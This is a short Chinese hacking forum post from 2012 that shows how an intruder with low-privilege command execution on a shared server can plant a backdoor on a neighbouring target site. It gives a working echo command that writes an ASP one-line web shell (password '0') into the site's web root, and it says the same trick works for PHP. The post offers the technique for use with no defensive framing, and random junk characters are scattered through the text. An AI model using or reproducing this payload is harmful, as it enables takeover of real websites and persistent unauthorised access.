在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
2 c$ C- H* g# Z5 u1 F2 v% R" P: O. G+ _3 E( Z0 ~
命令格式' d+ f, J9 _; E1 _4 [( j& v
& ^6 M0 j3 B. z2 v; g* q: D% lEcho 语句 >目标站绝对目录: [6 p$ n& G$ X$ {% N% T
; K* q* b/ Y4 B" c- P例如:
/ H3 e9 y! Q1 R- y" L- t" q+ D6 e/ M4 J. P" N" U
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp6 W5 ~ Q. J1 X: G6 J
' N8 X3 w- y$ g K这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
. x" J/ n1 e" f" d* h |
发表于 2012-9-23 14:40:24
收藏
支持
反对